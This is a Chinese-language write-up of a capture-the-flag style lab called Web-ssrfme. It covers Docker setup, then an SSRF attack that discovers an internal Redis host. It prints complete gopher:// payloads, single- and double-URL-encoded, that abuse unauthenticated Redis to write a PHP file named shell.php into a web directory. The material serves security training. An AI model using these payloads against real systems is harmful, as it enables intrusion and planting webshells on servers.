一.环境搭建
1.1宝塔安装docker
1.2将Web-ssrfme压缩文件放入Ubuntu并解压
root@eden-virtual-machine:/# mkdir Web-ssrfme
root@eden-virtual-machine:/Web-ssrfme# ll
total 2956
drwxr-xr-x 2 root root 4096 4月 18 02:43 ./
drwxr-xr-x 24 root root 4096 4月 18 02:41 ../
-rw-r--r-- 1 root root 3015411 4月 18 02:43 web-ssrfme.tar.gz
root@eden-virtual-machine:/Web-ssrfme# tar -zxvf web-ssrfme.tar.gz
root@eden-virtual-machine:/Web-ssrfme# ll
total 2960
drwxr-xr-x 3 root root 4096 4月 18 02:50 ./
drwxr-xr-x 24 root root 4096 4月 18 02:41 ../
drwxr-xr-x 4 root root 4096 2月 23 2022 web-ssrfme/
-rw-r--r-- 1 root root 3015411 4月 18 02:43 web-ssrfme.tar.gz
root@eden-virtual-machine:/Web-ssrfme# cd web-ssrfme/
root@eden-virtual-machine:/Web-ssrfme/web-ssrfme# ll
total 20
drwxr-xr-x 4 root root 4096 2月 23 2022 ./
drwxr-xr-x 3 root root 4096 4月 18 02:50 ../
-rw-r--r-- 1 root root 168 2月 17 2022 docker-compose.yml
drwxr-xr-x 3 root root 4096 2月 23 2022 redis/
drwxr-xr-x 4 root root 4096 2月 17 2022 web/
root@eden-virtual-machine:/Web-ssrfme/web-ssrfme# mv docker-compose.yml redis/ web/ /Web-ssrfme/
root@eden-virtual-machine:/Web-ssrfme/web-ssrfme# cd ..
root@eden-virtual-machine:/Web-ssrfme# ll
total 2972
drwxr-xr-x 5 root root 4096 4月 18 02:58 ./
drwxr-xr-x 24 root root 4096 4月 18 02:41 ../
-rw-r--r-- 1 root root 168 2月 17 2022 docker-compose.yml
drwxr-xr-x 3 root root 4096 2月 23 2022 redis/
drwxr-xr-x 4 root root 4096 2月 17 2022 web/
drwxr-xr-x 2 root root 4096 4月 18 02:58 web-ssrfme/
-rw-r--r-- 1 root root 3015411 4月 18 02:43 web-ssrfme.tar.gz
root@eden-virtual-machine:/Web-ssrfme# rm -r web-ssrfme
root@eden-virtual-machine:/Web-ssrfme# rm web-ssrfme.tar.gz
root@eden-virtual-machine:/Web-ssrfme# ll
total 20
drwxr-xr-x 4 root root 4096 4月 18 03:01 ./
drwxr-xr-x 24 root root 4096 4月 18 02:41 ../
-rw-r--r-- 1 root root 168 2月 17 2022 docker-compose.yml
drwxr-xr-x 3 root root 4096 2月 23 2022 redis/
drwxr-xr-x 4 root root 4096 2月 17 2022 web/
为了兼容可以删除docker-compose.yml中的version: "3"
1.3构造本地镜像
root@eden-virtual-machine:/Web-ssrfme# docker-compose build
#报以下这个错误可以通过更换web和redis中的Dockerfile里的源解决
# 更换软件源为阿里云镜像源
RUN sed -i 's|http://archive.ubuntu.com/ubuntu/|http://mirrors.aliyun.com/ubuntu/|g' /etc/apt/sources.list
=> ERROR [redis 3/13] RUN apt-get -y update && apt-get install -y --no-install-recommends apt-transpo 0.9s
------
> [redis 3/13] RUN apt-get -y update && apt-get install -y --no-install-recommends apt-transport-https ca-certificates software-properties-common && apt-get clean && rm -rf /var/lib/apt/lists/*:
0.715 Reading package lists...
0.728 E: The method driver /usr/lib/apt/methods/https could not be found.
0.728 E: The method driver /usr/lib/apt/methods/https could not be found.
0.728 E: The method driver /usr/lib/apt/methods/https could not be found.
0.728 E: The method driver /usr/lib/apt/methods/https could not be found.
------
failed to solve: process "/bin/sh -c apt-get -y update && apt-get install -y --no-install-recommends apt-transport-https ca-certificates software-properties-common && apt-get clean && rm -rf /var/lib/apt/lists/*" did not complete successfully: exit code: 100
更换后
root@eden-virtual-machine:/Web-ssrfme# docker-compose build
Compose can now delegate builds to bake for better performance.
To do so, set COMPOSE_BAKE=true.
[+] Building 222.3s (33/33) FINISHED docker:default
=> [redis internal] load build definition from Dockerfile 0.0s
[+] Building 2/2
? redis Built 0.0s
? web Built
#成功安装
root@eden-virtual-machine:/Web-ssrfme# docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
ctf/ssrfme latest dba46cf12d6d About a minute ago 392MB
web-ssrfme-redis latest 7b3392c7a0b8 3 minutes ago 429MB
#镜像已生成1.4宝塔面板拉取创建容器
剩下的跟着宝塔的提示走即可,注意端口不能倍占用防火墙放行
1.5验证
看到这段代码说明环境没问题
二.发现漏洞
2.1分析代码
分析查看代码发现正则过滤了file,dict,源地址,localhost,发现如果存在info这个参数就会打印phpinfo,打印phpinfo可能会有一些对我们有用的信息
成功找到内网ip:172.17.0.3:80
然后我们就可以用burp suite来探测该网段存活的主机
2.2burp suite探测
探测主机ip
抓包发送到intruder模块,从1-255开始扫
可以看到在172.17.0.2上还有一台主机,并且上面还运行着http服务,那么我们可以尝试扫描一下这台主机的端口
探测端口号
因为我这个burp suite是社区版,扫描太慢了,所以这里开一下上帝模式从6300扫到6400
6379这个端口明显的redis服务的报错,说明该主机上还运行着redis服务那么我们试试redis的未授权访问攻击
然后我们在探测一下都有哪些目录
探测目录
github上随便找的字典扫出来一个upload目录
我们进入容器看看有没有这个目录
说明这个目录真实存在
三.redis的未授权访问攻击
3.1构造payload
使用Gopherus这个工具来构造我们的payload,这个工具在github上是开源的但是有点老了用的时python2,网站如果没改应该都是在/var/www/html下的这个只有自己猜了。所以我猜的物理路径为:/var/www/html/upload
源码为
gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2422%0D%0A%0A%0A%3C%3Fphp%20phpinfo%28%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2420%0D%0A/var/www/html/upload%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A
一点要将127.0.0.1改为你的ip这里我改为172.17.0.2
gopher://172.17.0.2:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2422%0D%0A%0A%0A%3C%3Fphp%20phpinfo%28%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2420%0D%0A/var/www/html/upload%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A
圈圈没转多久说明解码有问题,在进入浏览器时要先进行一次url解码所以我们在源码的基础上再进行二次url编码看看
gopher://172.17.0.2:6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252422%250D%250A%250A%250A%253C%253Fphp%2520phpinfo%2528%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252420%250D%250A/var/www/html/upload%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A
这里转圈圈卡住了说明正在解码脚本成功写入